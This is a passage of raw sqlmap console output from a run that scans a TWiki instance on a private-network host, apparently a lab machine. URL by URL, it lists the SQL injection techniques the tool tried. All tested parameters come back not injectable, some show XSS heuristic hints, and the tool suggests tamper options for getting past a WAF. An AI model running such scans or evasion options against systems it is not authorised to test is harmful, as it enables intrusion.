[19:29:26] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:29:26] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:29:26] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:29:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:29:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:29:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:29:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:29:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:29:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:29:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:29:30] [INFO] testing 'MySQL inline queries' | |
[19:29:30] [INFO] testing 'PostgreSQL inline queries' | |
[19:29:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:29:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:29:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:29:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:29:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:29:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:29:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:29:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:29:34] [INFO] testing 'Oracle AND time-based blind' | |
[19:29:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:29:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:29:50] [WARNING] GET parameter 'param2' is not injectable | |
[19:29:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 112: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiFAQ?t=1441457226 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:29:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiFAQ?t=1441457226' | |
[19:29:50] [INFO] testing connection to the target URL | |
[19:29:51] [INFO] testing if the target URL is stable | |
[19:29:51] [INFO] target URL is stable | |
[19:29:51] [INFO] testing if GET parameter 't' is dynamic | |
[19:29:51] [WARNING] GET parameter 't' does not appear dynamic | |
[19:29:52] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:29:52] [INFO] testing for SQL injection on GET parameter 't' | |
[19:29:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:29:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:29:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:29:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:29:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:29:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:29:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:29:55] [INFO] testing 'MySQL inline queries' | |
[19:29:55] [INFO] testing 'PostgreSQL inline queries' | |
[19:29:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:29:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:29:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:29:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:29:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:29:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:29:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:29:58] [INFO] testing 'Oracle AND time-based blind' | |
[19:29:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:29:59] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:30:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:30:10] [WARNING] GET parameter 't' is not injectable | |
[19:30:10] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 113: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *FAQ[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:30:10] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *FAQ[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:30:10] [INFO] testing connection to the target URL | |
[19:30:11] [INFO] testing if the target URL is stable | |
[19:30:12] [INFO] target URL is stable | |
[19:30:12] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:30:12] [WARNING] URI parameter '#1*' does not appear dynamic | |
[19:30:12] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:30:12] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:30:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:30:12] [WARNING] reflective value(s) found and filtering out | |
[19:30:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:30:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:30:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:30:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:30:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:30:16] [INFO] testing 'MySQL inline queries' | |
[19:30:16] [INFO] testing 'PostgreSQL inline queries' | |
[19:30:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:30:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:30:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:30:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:30:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:30:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:30:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:30:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:30:20] [INFO] testing 'Oracle AND time-based blind' | |
[19:30:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:30:20] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:30:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:30:33] [WARNING] URI parameter '#1*' is not injectable | |
[19:30:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 114: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:30:33] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?skin=print' | |
[19:30:33] [INFO] testing connection to the target URL | |
[19:30:34] [INFO] testing if the target URL is stable | |
[19:30:34] [INFO] target URL is stable | |
[19:30:34] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:30:35] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:30:35] [INFO] GET parameter 'skin' is dynamic | |
[19:30:35] [INFO] heuristics detected web page charset 'ascii' | |
[19:30:35] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:30:36] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:30:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:30:36] [WARNING] reflective value(s) found and filtering out | |
[19:30:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:30:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:30:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:30:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:30:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:30:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:30:54] [INFO] testing 'MySQL inline queries' | |
[19:30:54] [INFO] testing 'PostgreSQL inline queries' | |
[19:30:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:30:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:30:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:30:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:31:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:31:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:31:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:31:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:31:12] [INFO] testing 'Oracle AND time-based blind' | |
[19:31:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:31:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:31:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:32:13] [WARNING] GET parameter 'skin' is not injectable | |
[19:32:13] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 115: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiFAQ?rev1=1.13&rev2=1.12 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:32:13] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiFAQ?rev1=1.13&rev2=1.12' | |
[19:32:13] [INFO] testing connection to the target URL | |
[19:32:14] [INFO] testing if the target URL is stable | |
[19:32:15] [INFO] target URL is stable | |
[19:32:15] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:32:15] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:32:16] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:32:16] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:32:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:32:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:32:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:32:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:32:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:32:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:32:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:32:28] [INFO] testing 'MySQL inline queries' | |
[19:32:28] [INFO] testing 'PostgreSQL inline queries' | |
[19:32:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:32:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:32:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:32:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:32:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:32:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:32:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:32:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:32:32] [INFO] testing 'Oracle AND time-based blind' | |
[19:32:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:32:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:32:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:32:44] [WARNING] GET parameter 'rev1' is not injectable | |
[19:32:44] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:32:45] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[19:32:45] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:32:45] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:32:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:32:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:32:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:32:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:32:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:32:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:32:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:32:49] [INFO] testing 'MySQL inline queries' | |
[19:32:49] [INFO] testing 'PostgreSQL inline queries' | |
[19:32:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:32:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:32:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:32:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:32:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:32:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:32:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:32:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:32:53] [INFO] testing 'Oracle AND time-based blind' | |
[19:32:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:33:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:33:48] [WARNING] GET parameter 'rev2' is not injectable | |
[19:33:49] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 116: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?rev=1.12 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:33:49] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?rev=1.12' | |
[19:33:49] [INFO] testing connection to the target URL | |
[19:33:50] [INFO] testing if the target URL is stable | |
[19:33:50] [INFO] target URL is stable | |
[19:33:50] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:33:51] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:33:51] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:33:51] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:33:51] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:33:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:33:52] [WARNING] reflective value(s) found and filtering out | |
[19:33:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:33:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:34:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:34:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:34:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:34:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:34:09] [INFO] testing 'MySQL inline queries' | |
[19:34:09] [INFO] testing 'PostgreSQL inline queries' | |
[19:34:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:34:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:34:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:34:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:34:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:34:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:34:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:34:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:34:25] [INFO] testing 'Oracle AND time-based blind' | |
[19:34:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:34:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:34:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:35:23] [WARNING] GET parameter 'rev' is not injectable | |
[19:35:23] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:35:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiFAQ?rev1=1.12&rev2=1.11' | |
[19:35:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?rev=1.11' | |
URL 117: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiFAQ?template=oopsmore¶m1=1.13¶m2=1.13 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:35:23] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiFAQ?template=oopsmore¶m1=1.13¶m2=1.13' | |
[19:35:23] [INFO] testing connection to the target URL | |
[19:35:23] [INFO] testing if the target URL is stable | |
[19:35:24] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:35:24] [INFO] testing if GET parameter 'template' is dynamic | |
[19:35:24] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:35:25] [INFO] GET parameter 'template' is dynamic | |
[19:35:25] [INFO] heuristics detected web page charset 'ascii' | |
[19:35:25] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:35:25] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:35:25] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:35:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:35:26] [WARNING] reflective value(s) found and filtering out | |
[19:35:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:35:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:35:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:35:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:35:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:35:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:35:37] [INFO] testing 'MySQL inline queries' | |
[19:35:38] [INFO] testing 'PostgreSQL inline queries' | |
[19:35:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:35:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:35:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:35:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:35:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:35:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:35:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:35:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:35:50] [INFO] testing 'Oracle AND time-based blind' | |
[19:35:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:35:52] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:36:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:36:30] [WARNING] GET parameter 'template' is not injectable | |
[19:36:30] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:36:30] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:36:31] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:36:31] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:36:31] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:36:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:36:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:36:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:36:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:36:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:36:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:36:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:36:46] [INFO] testing 'MySQL inline queries' | |
[19:36:47] [INFO] testing 'PostgreSQL inline queries' | |
[19:36:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:36:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:36:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:36:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:36:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:36:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:36:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:36:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:37:00] [INFO] testing 'Oracle AND time-based blind' | |
[19:37:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:37:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:37:59] [WARNING] GET parameter 'param1' is not injectable | |
[19:37:59] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:37:59] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:37:59] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:38:00] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:38:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:38:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:38:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:38:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:38:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:38:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:38:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:38:12] [INFO] testing 'MySQL inline queries' | |
[19:38:12] [INFO] testing 'PostgreSQL inline queries' | |
[19:38:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:38:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:38:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:38:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:38:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:38:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:38:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:38:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:38:27] [INFO] testing 'Oracle AND time-based blind' | |
[19:38:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:38:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:39:17] [WARNING] GET parameter 'param2' is not injectable | |
[19:39:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 118: | |
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic1?topicparent=Sandbox.WebHome | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:39:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic1?topicparent=Sandbox.WebHome' | |
[19:39:17] [INFO] testing connection to the target URL | |
[19:39:18] [INFO] testing if the target URL is stable | |
[19:39:18] [INFO] target URL is stable | |
[19:39:18] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[19:39:19] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[19:39:19] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[19:39:19] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[19:39:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:39:19] [WARNING] reflective value(s) found and filtering out | |
[19:39:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:39:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:39:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:39:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:39:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:39:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:39:23] [INFO] testing 'MySQL inline queries' | |
[19:39:24] [INFO] testing 'PostgreSQL inline queries' | |
[19:39:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:39:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:39:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:39:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:39:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:39:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:39:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
